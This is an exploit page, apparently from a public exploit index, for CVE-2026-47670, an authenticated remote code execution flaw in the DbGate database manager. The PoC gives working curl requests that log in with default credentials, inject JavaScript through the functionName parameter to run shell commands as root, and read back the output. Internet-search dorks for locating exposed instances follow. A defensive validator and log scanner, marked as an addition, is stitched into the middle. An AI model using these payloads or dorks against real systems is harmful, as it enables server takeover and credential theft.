## https://sploitus.com/exploit?id=B465A130-C879-5825-89F0-6EB7CB8DCEBD
# CVE-2026-47670

[![Python](https://img.shields.io/badge/Python-3.12%2B-blue.svg)][01]
[![CVSS](https://img.shields.io/badge/CVSS-9.9%20CRITICAL-darkred.svg)][03]
[![License](https://img.shields.io/badge/License-SCTPL-green.svg)](./LICENSE)
[![Educational](https://img.shields.io/badge/Purpose-Educational%20Only-yellow.svg)](./LICENSE)

Authenticated Remote Code Execution via loadReader functionName code injection in DbGate

[DbGate][08] is an open-source, cross-platform database management tool
designed for developers and database administrators who need to work with
multiple database systems simultaneously. It provides a unified web-based
and desktop interface for managing both SQL and NoSQL databases - including
MySQL, PostgreSQL, SQL Server, MongoDB, SQLite, Oracle, and others - without
switching between different client applications. DbGate runs as a standalone
desktop application on Windows, macOS, and Linux, or can be deployed as a
web application via Docker, making it popular for team environments and
remote database administration scenarios.

**CVE-2026-47670** is an **authenticated Remote Code Execution** (RCE)
vulnerability affecting DbGate versions **prior to** *7.1.9*. The flaw
exists in the `/runners/load-reader` endpoint, where the `functionName`
parameter is passed to an unsafe code execution path without proper
sanitization. An attacker with valid DbGate credentials can inject arbitrary
JavaScript code through this parameter, which gets **executed** on the server
with **root privileges**. The vulnerability is particularly dangerous because
the application's `require = null` mitigation can be trivially bypassed
using dynamic `import()` statements, allowing attackers to **spawn shells**,
**exfiltrate database credentials**, pivot to connected database servers,
or fully compromise the host system.
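As an added, defender-side example that is not part of this PoC or of DbGate's own code: since the flaw is `functionName` being treated as code, the fix is to never evaluate it at all, only to match it against a fixed allowlist and fail closed. The reader names and the JSON request-log format below are assumed.

```javascript
// Constructed allowlist: the real set of reader names in DbGate is assumed here.
const KNOWN_READERS = new Set(['csvReader', 'jsonReader', 'jsonlReader']);

// Returns the validated reader name or throws. The identifier regex alone
// already rejects the "csvReader\n..." shape used in the PoC, and the
// allowlist closes the remaining gap (no unknown names, no lookalikes).
function validateFunctionName(functionName) {
  if (typeof functionName !== 'string') throw new TypeError('functionName must be a string');
  if (!/^[A-Za-z_][A-Za-z0-9_]*$/.test(functionName)) throw new Error('functionName is not an identifier');
  if (!KNOWN_READERS.has(functionName)) throw new Error(`unknown reader: ${functionName}`);
  return functionName;
}

// Detection side: scan JSON-lines request logs and flag load-reader calls whose
// functionName the validator would reject. Each hit records who sent it and why.
function flagSuspiciousRequests(lines) {
  const hits = [];
  for (const line of lines) {
    let entry;
    try { entry = JSON.parse(line); } catch { continue; } // skip malformed lines
    if (entry.path !== '/runners/load-reader') continue;
    try {
      validateFunctionName(entry.body?.functionName);
    } catch (err) {
      hits.push({ user: entry.user, reason: err.message });
    }
  }
  return hits;
}

// Constructed sample log: one benign call, one newline injection, one unknown
// reader name, and one unrelated endpoint that must be ignored.
const SAMPLE_LOG = [
  { path: '/runners/load-reader', user: 'alice', body: { functionName: 'csvReader', props: {} } },
  { path: '/runners/load-reader', user: 'mallory', body: { functionName: 'csvReader\nvar x = 1;//', props: {} } },
  { path: '/runners/load-reader', user: 'mallory', body: { functionName: 'notAReader', props: {} } },
  { path: '/jsldata/get-rows', user: 'alice', body: { jslid: 'file:///tmp/x.jsonl' } },
].map((e) => JSON.stringify(e));

console.log(flagSuspiciousRequests(SAMPLE_LOG)); // two hits, both from mallory
```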

## PoC

```bash
# Step 1 - authenticate and obtain Bearer token
curl -s -X POST http://example.com/auth/login \
  -H 'Content-Type: application/json' \
  -d '{"amoid":"logins","login":"admin","password":"admin"}' | grep accessToken

# RESPONSE
# ========
{"accessToken":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhbW9pZCI6ImxvZ2lucyIsImxvZ2luIjoiYWRtaW4iLCJpYXQiOjE3ODE3NzMwNDIsImV4cCI6MTc4MTc3NjY0Mn0.M61gw5bidF2kyzZwRukwzv0yxm3Zj0tUItdPqCXDQ_Y"}

# Step 2 - inject via functionName (replace TOKEN and /tmp/_dbg_poc.jsonl)
curl -s -X POST http://example.com/runners/load-reader \
  -H 'Content-Type: application/json' \
  -H 'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhbW9pZCI6ImxvZ2lucyIsImxvZ2luIjoiYWRtaW4iLCJpYXQiOjE3ODE3NzMwNDIsImV4cCI6MTc4MTc3NjY0Mn0.M61gw5bidF2kyzZwRukwzv0yxm3Zj0tUItdPqCXDQ_Y' \
  -d '{"functionName":"csvReader\nvar _f=await import(\"fs\");var _c=await import(\"child_process\");var _o=_c.execSync(\"id\").toString().trim();_f.writeFileSync(\"/tmp/_dbg_poc.jsonl\",JSON.stringify({__isStreamHeader:true,columns:[{columnName:\"out\"}]})+String.fromCharCode(10)+JSON.stringify({out:\"CANARY \"+_o})+String.fromCharCode(10));//","props":{}}'

# RESPONSE
# ========
{"apiErrorMessage":"The \"body\" argument must be of type function or an instance of Blob, ReadableStream, WritableStream, Stream, Iterable, AsyncIterable, or Promise or { readable, writable } pair. Received undefined"}

# Step 3 - read back command output
curl -s -X POST http://example.com/jsldata/get-rows \
  -H 'Content-Type: application/json' \
  -H 'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhbW9pZCI6ImxvZ2lucyIsImxvZ2luIjoiYWRtaW4iLCJpYXQiOjE3ODE3NzMwNDIsImV4cCI6MTc4MTc3NjY0Mn0.M61gw5bidF2kyzZwRukwzv0yxm3Zj0tUItdPqCXDQ_Y' \
  -d '{"jslid":"file:///tmp/_dbg_poc.jsonl","offset":0,"limit":100}'

# RESPONSE
# ========
[{"out":"CANARY uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)"}]
```

## Usage

```txt
python CVE-2026-47670-X7.py
```

* [Zern][03]    : `title:"DbGate"`
* [Fofa][04]    : `title="DbGate"`
* [Shodan][05]  : `http.title:"DbGate"`

## Resources

* [OpenCVE - CVE-2026-47670][01] *(not yet published)*
* [NIST - CVE-2026-47670 Detail][02] *(not yet published)*
* [Gitlab Advisory Database - CVE-2026-47670][06]
* [Github - DbGate: Database manager for MySQL, PostgreSQL, SQL Server, MongoDB, SQLite and others][07]

## Authors

* ErrorInside // SCT

## License

SCT-PL

[01]: https://app.opencve.io/cve/CVE-2026-47670
[02]: https://nvd.nist.gov/vuln/detail/CVE-2026-47670
[03]: https://zern.io
[04]: https://en.fofa.info/
[05]: https://www.shodan.io/
[06]: https://advisories.gitlab.com/npm/dbgate-api/CVE-2026-47670/
[07]: https://github.com/dbgate/dbgate
[08]: https://www.dbgate.io/